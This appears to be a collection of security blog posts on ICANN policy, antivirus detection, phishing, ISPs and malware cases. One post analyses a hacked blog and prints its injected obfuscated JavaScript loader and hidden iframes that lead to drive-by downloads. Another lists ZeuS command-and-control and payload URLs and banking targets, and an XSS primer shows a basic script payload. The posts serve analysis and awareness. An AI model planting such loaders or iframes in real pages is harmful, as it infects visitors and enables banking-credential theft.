Icann's general meetings are held 3 times a year. Paris welcomes the 32nd event of this kind this week. It is a good occasion for various interest groups to share their opinions on the way Internet will/may/should evolve. It is also a place to openly discuss (and eventually agree on) policies that will regulate how the Web is operated.

The subject of a complete TLD (top-level domain name) extensions' liberalisation, announced (almost) without prior notice by the Director of Icann Paul Twomey some days ago, has made the headlines of major business newspapers such as yesterday's LesEchos.

A debate has occured between pros and cons during the "New gTLDs workshop", but from a security point fo view, this doesn't looks like a good idea. Mike Rodenbaugh expressed some concerns about such a move, that may endanger the security and stability of Internet. But other participants warmly endorsed the proposition.

Previously in the afternoon, Steve Crocker and Dave Piscitello from the SSAC committee warned the public about some other threats. They particularly exposed the risk of phishing attacks that target domain names portfolios and registrars impersonation attacks. The Comcast example served as an illustration for registrars attending this session. The problem of the DNS response modification by "entrusted agents" (registries, registrars, ISPs, etc.) has also been discussed. You may review the complete SSAC committee action plan on this page.

Numerous other topics of interest for the security community are raised during this week. The fast-flux hosting technique used in more and more malevolent activities was for example on the agenda of another meeting from the GNSO. This report from March 2008 helped the GNSO approve a resolution on the matter. Icann also seems to finally agree on another threat/moneymaking model -cross out words depending which business you're in- : Domain Tasting.

But Icann is a complex not-for-profit (sic) organisation. Different groups are lobbying for diverging (often financially motivated) interests: these groups can represent (linguistic or geographic) communities that want Icann to open a new TLD for their exclusive use. On the other hand, the CP80 foundation tries for example to encourage Icann to set standards -ports filtering for instance- at the governments or ISPs' level to rule out explicit adult content from the Web.

The heavy Icann structure and strong opposite forces often result in a slow decision process (remember the .XXX TLD story?). And on the other side, cybercriminals and cyberprofiteers don't have these burdens and will quickly identify "opportunities".

A few days ago, Pedro Bustamante from Panda wrote a very interesting post about automated AV signature creation, emphasizing the risk of false positives with such a method. He uses the example of a gaming company, Fenomen Games, that generates numerous distinct Gaming Downloaders. According to him, these binaries are not malicious, and massive FPs are automatically inserted by AV editors into their databases.

In order to cope with the exploding number of malware variants that are dynamically created, AV are forced to use various techniques to automatically analyze and detect new threats. This trend is a tough challenge and the race between goods and villains can probably not be won by AV engines through that way.

Automated malware analysis is undoubtedly the key due to the ever increasing number of malware variants being seen in-the-wild. But AVs, ISPs and LEAs should also try to make better use of all the intelligence gathered, and particularly the "network" connections initiated by these pieces of malware. Even if today virus are more and more difficult to reverse-engineer (think about StormWorm's automatic ddos protection or virtual machine detection used by more and more samples), most sandboxes still provide valuable information about command&control and blind drop Web servers.

For example, we noticed today that one of the samples we have -automatically- analyzed was trying to connect to a server located in the US at this address: http://XXXXquanglan4.t35.com/. New malware variants have been trying to download two files (setting.xls and setting.nql) from this server since May 2007 at least! They are known to be a specific Worm called Sohanad -also referenced as Pitin under some AV nomenclature- (see here or here for example). What is surprising here is that this malware propagation source is still online one year after being discovered. Let's hope it was deliberately kept online by LEAs or anti-cybercrime units for investigation purposes.

But what is even more disturbing is that these 2 files are only detected by 2 out of 32 AV editors' signatures according to yesterday's VT report (We'll talk another time about these detection rates, as it could be subject to some misunderstanding).

So far, we still need AV engines, but controversy on the AV industry has risen lately in numerous IT security forums and blogs. The RaceToZero contest dilemma and the latest moves in AV testing (merger of Anti Malware Test Lab and AV Comparatives, new Anti-Malware Testing Working Group set up by a bunch of AV editors, etc) prove that the industry will probably have to go through some serious changes.

I believe that more "human" investigators, able to require the hosting providers -such as t35.com- to disclose information about some of their customers, would help finding the real people behind these criminal activities, and not only dealing with the symptoms (a.k.a better protection against infections).

Today I saw that the front page of 0x000000.com looked empty. Was I going to spend a day without an interesting article to read? No, it wasn't possible!

A quick check of the source code revealed that the main page of this rather famous blog presented some obfuscated Javascript and a call to a suspicious Javascript file called webanalytics.js:

<script src="http://safe.google-xxxxxxxxx.com/webanalytics.js"></script>
<script>
function v47f05eb5a54fc(v47f05eb5a5505)
{ var v47f05eb5a5510=16;
return(parseInt(v47f05eb5a5505,v47f05eb5a5510));}
function v47f05eb5a5544(v47f05eb5a554a)
{  var v47f05eb5a5550=''; for(v47f05eb5a5556=0;
v47f05eb5a5556<v47f05eb5a554a.length; v47f05eb5a5556+=2)
{ 
v47f05eb5a5550+=(String.fromCharCode(v47f05eb5a54fc(v47f05eb5a554a.substr(v47f05eb5a5556, 2))));}
return v47f05eb5a5550;}
document.write(v47f05eb5a5544('3C5343524950543E77696E646F772E7374617475733D2
7446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37623
63731207372633D5C2768747...'));</script>

whereas the webanalytics.js contained:

function google_irl(google_ryg,google_famas) {
var google_xen = "";
for (var i = 0 ; i < google_ryg.length; ++i)
google_xen += String.fromCharCode(google_famas ^ google_ryg.charCodeAt(i));
return google_xen; }
function google_ritn(google_ftak) { eval(google_ftak); return;}
google_ritn(google_irl("\xcb\xd5\xd2\xd8\xd3\xcb\x92\xcf\xc8\xdd\xc8\xc9\xcf\x81
\x9e\xf8\xd3\xd2\xd9\x9e\x87\xb1\xb6\xd8\xd3\xdf\xc9\xd1\xd9\xd2\xc8\x92\xcb\xce
\xd5\xc8\xd9\x94\x9b\x80\xd5\x9b\x97\x9b\xda\xce\xdd\x9b\x97\x9b\xd1\xd9\x9c\xcf
\xce\x9b\x97\x9b\xdf\x81\x9e\x9b\x97\xc9\xd2\xd9\xcf\xdf\xdd\xcc\xd9\x94\x9b\xd4
\xc8\xc8\xcc\x99\x8f\xfd\x93\x93\x8e\x8c\x8d\x92\x8e\x8d\x84\x92\xxx\xxx\xxx\xxx
\xxx\xxx\xxx\x93\xcb\xd9\xde\xdd\xd2\xdd\xd0\xc5\xc8\xd5\xdf\xcf\x93\xdf\xd3\xc9
\xd2\xc8\x92\xcc\xd4\xcc\x99\x8f\xfa\xd3\x99\x8f\xf8\x8d\x9b\x95\x97\x9b\x9e\x9c
\xcb\xd5\xd8...", 188));

Those 2 scripts happened to be, as expected, 2 i-frames pointing towards a malicious website. This website is said to be in panama, according to the whois record of the ip address, but the domain is resolved by a Russian server. As for the owner, he is using a pseudo, has a Russian email address and is apparently living in Germany. Too much to believe...

The 2 i-frames looked like:

<iframe name=7b671 src='http://url/?100313d5ff' 
width=305 height=340 style='display: none'></iframe>

and

<iframe src="http://201.218.xxx.xxx/webanalytics/count.php?o=1" 
width="0" height="0" style="display:none">

Those i-frames, so widely spread nowadays, are often a sign of a drive-by-download situation. In that case, after a few exploits, a windows executable file is pushed to the browser and executed without any warning. This file (here called getexe.exe) downloads, as its name implies, another executable file called upda.exe. This file is the trojan horse, and will need its configuration file to know the targets. This malware, of the family of ntos/prg/wsnpoem/zeus, is a password stealer targeting banks.

The configuration file is encrypted. Once deciphered (on the fly by the malware), it shows all the targets. Among some of the well-known banking institutions, it seems that some more targets have been added:

...
citibank.ru_balance: section 3
http://login.osmp.ru/*
http://www.osmp.ru/dealer/index.php*
https://www.e-gold.com/acct/acct.asp
https://www.e-gold.com/acct/li.asp
https://www.e-gold.com/acct/balance.asp
https://www.moneybookers.com/app/my_account.pl
https://www.epassporte.com/secure/epassporte.cgi
https://light.webmoney.ru/Default.aspx?l=*
http://money.yandex.ru/*
...

Once again, we learn that being a computer security professional doesn't mean you cannot be hacked. No matter how secure you feel, you should always stay up to date on every aspect of your computer security : run as less services as possible, upgrade your software every time an upgrade is out, run internal audit as often as you can to detect a potentially bad behaviour from your servers, have good IDS/IPS with rules that you understand ...

A high number of popular websites have been hacked recently, through different techniques, supplying unknown malware to their visitors. This easy way of spreading malware will be used more and more.

Today's attack was not a great movie but was somehow something very usual. I hope public awareness and developers' cautiousness will help lower the number of attacks and their impact.

Update: We exchanged some e-mails yesterday with the owner of 0x000000.com , who's been bringing some facts to our attention. At first, 0x000000.com is hosted on a shared server. Then he pointed out that many other domains hosted on the same server had been hacked, which proves that the attack was not targeted, but rather generic. We thank him for this information, and once again we encourage you to read his writings, which are of great interest.

In Greek mythology, Zeus is the king of all Gods. He is powerful and can strike any time any where using his thunderbolts. In computer security, ZeuS is just another powerful malware, also known as PRG, ZBOT, or NTOS by some AV editors.

At first, ZeuS was sold on the black market, and could be configured to the buyer's desire. It has mainly bot capabilities at that time, and its popularity quickly grew in the pirates community. But this fame was a bit too much for its author, who is believed to have stopped selling it. Yet new variants still continue to arrive on a daily basis, either produced by the original author or by other malware programmers. It got a lot of improvements, and is now a very nasty and active banking trojan. We have been watching it evolve for months, but recently we noticed a slight increase in the amount of PRG spreading around.

Last night, I got 18 different variants of ZeuS downloaders. A variant means that the binary is not exactly the same, each one having a different MD5 (or SHA256) hash. Therefore, I decided it was high time to make some comparisons between these variants. "Grep" in one hand, "sort" and "uniq" in the other (after all I'm a geek), I started digging the different configurations I had in my possession. My goal was getting the different command&control (or C&C) servers of these trojans.

At first glance, it was obvious that the configuration files were not exactly the same, as they were targeting different banking institutions. I could for example find one specific bank in a single file, but not in the others. Furthermore, some other banks were specifically targeted by some variants, and some were in all. Also, the c&c server and the PHP script collecting the data were stored on different servers. From the 18 downloaders I had, there were 8 different places where the scripts could be found :

http://195.2.x.x/11/s.php
http://195.2.x.x/11/s.php/11/s.php
http://195.2.x.x/11/s.php5
http://195.93.x.x/~xxx/a5y5ju79h/s.php
http://195.93.x.x/xxx/a5y5ju79h/s.php
http://202.75.x.x/zeus/s.php
http://xxx.la/vvv/s.php
http://xxx.la/vvv/s.php/vvv/s.php3

Most of these scripts are not surprisingly hosted in Russia, while some are in Malaysia.

As for the places where all the downloaders connect to retrieve the actual Trojan, we discovered that there were only 4 different locations:

http://195.2.x.x/hh/ldr.exe
http://195.2.x.x/11/ldr.exe
http://85.255.x.x/download/1013.exe
http://xxxxxxx-xxxxxxxx.com/images/m.exe
Russian, Ukrainian, and Turkish IPs are hosting these malicious binaries.

As for their detection by AV products, it is luckily quite high for the 18 downloaders : an average of 20 AV editors out of 32 (from VirusTotal.com) are recognizing these variants. But for the trojan itself, "m.exe", and "ldr.exe", were only detected by three AV editors at the time of this writing.

You can find more info about ZeuS on Kaspersky's Viruslist.com here.

Remember the fraud campaign we discovered last summer ?

Well, we've been keeping an eye on this Trojan. Its configuration file has been regularly updated. Today the encrypted activation strings changed again to include some new targets in Italy or Malta (Bank of Valletta, BancadiRoma, BancodeSicilia for example).
But more interestingly, 2 new URL-strings have been added to targets:

(Extract)

---

...
+*dorcel.com
+*janswebring.com
...

---

(the "*" in front of the domain names means that all sub-domains are also being monitored as targets).

The pirates seem to look for accounts from the famous French porn producer Marc Dorcel and from the "Adult Movie Fan Community" JansWebring porn websites.

So, are they just bored of stealing money or is there a new “proof-of-concept” fraud-technique behind it?

If you're dealing with web server security, you might already know the XSSED website. It is focused on providing XSS vulnerabilities found on web servers, information that are provided by numerous contributors only identified by their nicknames. If you don't know what an XSS (also known as Cross-site Scripting) vulnerability is, I'll try making it short.

First, I should say this kind of vulnerability is one of the most basic (with SQL Injection) and common that you can find on web servers. It consists of "injecting" javascript and/or html into a web server. It is mainly done by adding specific data into the usual URL.

Let's say there's a website called www.websiteX.com, with this URL shown in the browser:

http://www.websiteX.com/index.php?page=2

This basically tells the browser to connect to index.php and to set and send a value "2" for the variable "page". Now if I change this value, and set it to 3 for example (http://www.websiteX.com/index.php?page=3), then my browser shows me another page. Once again, I won't dive into details about PHP or any other technique. Let's just imagine some PHP scripts are handling the infos you send them quite badly, allowing the execution of remote code.

So now what if I put strange values to the variable page, or even...some javascript code ? Like this : http://www.websiteX.com/index.php?page=<script>alert("hello world");</script>

Whoaaah, the result is what I expected : a popup appears, containing the text "hello world". Now we know this index.php script is handling the variable "page" very badly. We could go on and do nastier things, but this is not the point. But if you want to know more, XSSED is a good starting link. You can even be warned when a vulnerability is found on one of your own domain, including all its subdomains, which is an interesting (but not sufficient) feature to start protecting your perimeter.

Recently, xssed.com and xssing.com announced they were now affiliated and working together. XSSing.com is also specialised on XSS techniques. Publishing XSS vulnerabilities about other people you don't necessary know is one thing. But today, someone called ZuLL reported a vulnerability directly found on the xssing.com website.

Now, this is a called transparency!

This surely is great news.

Laura Mather from the APWG (Anti-Phishing Working Group) declared that the DotAsia Organisation had agreed to a new policy, consisting of banning domains associated to phishing.

This new registry which has just launched the .asia gTLD (generic Top Level Domain) seems to be willing to close down the domains leading to phishing content.

We're glad to hear this, because registries usually set explicit policies restraining them to interfere in disputes regarding domain names. These policies are particularly driven by their need to protect themselves against legal issues and from overwhelming work.

But to shut down a fraudulent website using fast-flux botnet techniques, your only hope is going after the domain name, and so to contact the registrar. But at the registrar level, it takes often too much time to be really effective because of insufficient staff/process capacity or declared complaisance with fraudsters from some of these companies. (Who said Estdomains?)

Directly shutting down the domain has its advantages compared to remove the content on the hosting side, since there are a growing number of phishing campaigns using "fast flux"-like technology. It is not rare nowadays to see one campaign being hosted on twenty servers or more. Even if one is shut down, the others are still active. But in this case, there is often a single domain leading to all these hosts. Cutting this link is the only efficient way to stop this kind of phishing.

To have the registries getting involved in the fight against phishing would definitely be helpful, particularly if they put some effort (staff members, extended hours…) on the matter. On their side, DotAsia seems to want to rely on a few trusted sources that will send them verified information.

Let’s hope such willingness turn into reality and effective success, and give ideas to the other registries...

In this period full of "Storms" and other malware, spreading worldwide in such an efficient manner, the need for cooperation between security companies has never been so huge.

• Computer Emergency Response Teams (CERT) collaborate on important topics, like fighting against phishing/pharming, providing information to each other, exchanging tips, and so on;
• Law Enforcement Agencies get to work together more and more. Although the system is far from being perfect, it is growing and getting better every day, with new cybercrime laws;
• Anti-Virus companies exchange data with each other, and cooperate with LE and sometimes CERTs;
• Incident Response Teams from many companies are in contact with one another, and are generally working well with LE.

Now what about the ISP who are giving you your daily connection to Internet ? In order to keep things clear, you have to be aware that this article only covers french ISPs.

In 1997, they founded the AFA (Associations des Fournisseurs d'Accès), an association to help develop Internet in France, to inform the public, and to cooperate internationaly with other ISPs. They also provide protection against child porn and are involved in anti-spam organisations. Now what do they do against malware ? You don't need to think about it for long : they do nothing. In some cases where they really could have a positive effect against cybercrime, they choose not to act.

Let's say you are a computer security professional working on a huge botnet. You see thousands of IP addresses from ISP in your country, all sending DNS and TCP packets to badstuff.com. Browsing www.badstuff.com, you see no web content. Now looking at the "whois" data from badstuff.com, you notice immediately it has been created to collect information from bots : it has been registered by John Doe, Planet Earth, h4ck1ngmastah@badstuff.com.

Calling the ISP, you tell him he should block all connections trying to reach this particular domain, because it is hosting the command&control of a big bad botnet, stealing personnal and confidential information to their customers. Moreover, you offer them to provide all the IP addresses+timeline of the infected computers, so that they can call their customers and explain them they are infected.

With usually a charming voice, they answer your request:

• We are sorry, but technically, we cannot block in such way;
• We are sorry, although we could technically do it, we won't, because it would infringe the freedom spirit of the Internet/the privacy rights of our customers;

Now take one of these two sentences as an introduction, and add one of the following, depending on the ISP:

• We are very interested in the IP addresses you collected while studying this botnet. Now we won't tell the users ;
• We are not interested at all, and won't say anything to our customers ;
• We are not interested at all, and if you say anything regarding our customers to the press, or if you say anything to our customers, we will engage a legal procedure against you. (the voice, in this case, is still charming, which is even more frightening).

We talked about blocking a single domain. Now imagine how an ISP reacts when you show him a complete range of malicious IP addresses from a well-known bulletproof hosting company...

Isn't this frustrating ?

The first Phishtank.com annual report was released today.

No big news, but their statistics are still interesting and partially consistent with some of our own findings. France, for instance, occupies the fifth place among countries hosting the most fraudulent sites, with 4,8%. Proxad (parent company of the famous French ISP - Free) is by the way ranked 7th among phishing hosting networks.

But none of the French banks is listed among the first 69 targeted companies. This said, these statistics are of course fragmented, as we see on our side a few hundreds of phishing websites targeting French institutions (including those targeting the Free ISP!).

Brian Krebs's blog provide a copy of this report here and an article on the matter here.

Some days ago, a 25 years old chinese programmer named Li Jun, has been sentenced to four years of prison. Li Jun is the writer of the famous "Fujacks" computer virus, also known as "Panda Burns Joss Stick". Three of his friends, Wang Lei, Zhang Shun and Lei Lei, have also been sentenced in the same case.

The virus had been sold by Li Jun and his accomplices, and had made them earn between 100 000 and 200 000 yuan (12 500-25 000 dollars). Once a machine was infected with Fujacks, it was changing the icon of every infected program. The new icon was a panda holding joss sticks. It was also stealing private information from users.

Earlier this year, Li Jun had written a software solution to clean infected machines from his virus, following a request from the Chinese authorities. It seems that the prosecutor didn't really take this into account.

Now what is more disturbing is that quite immediately after this judgement, Li Jun saw himself "spammed" with job offers from IT companies. A company hit by the malware has offered Li Jun a position of technology director, including a salary of a million yuan ($130.000) a year, after hearing that Li Jun had programmed the virus because he was bored of not finding a job, according to the Changjiang Times. About ten companies have also offered jobs to the malware author.

This idea of "doing the worst to get the best" is very disturbing in the IT field. There have been numerous cases through the last twenty years showing that some malicious programmers could get real good jobs, and this affair is surely not the only one this year. 17 years old Georges Hotz is another example of a sudden job success. By breaking the iPhone lock protection, making it able to be used on any operators, Georges was offered a job at Certicell, as a consultant.

These are only two cases amongst many. Of course, when someone is sentenced to prison and comes back to society, he should be fully reintegrated into it. But coming back from prison and getting a juicy job could give ideas to a lot of other programmers, bored of being jobless. Especially in countries where laws are unexistent or very accomodating with such cases...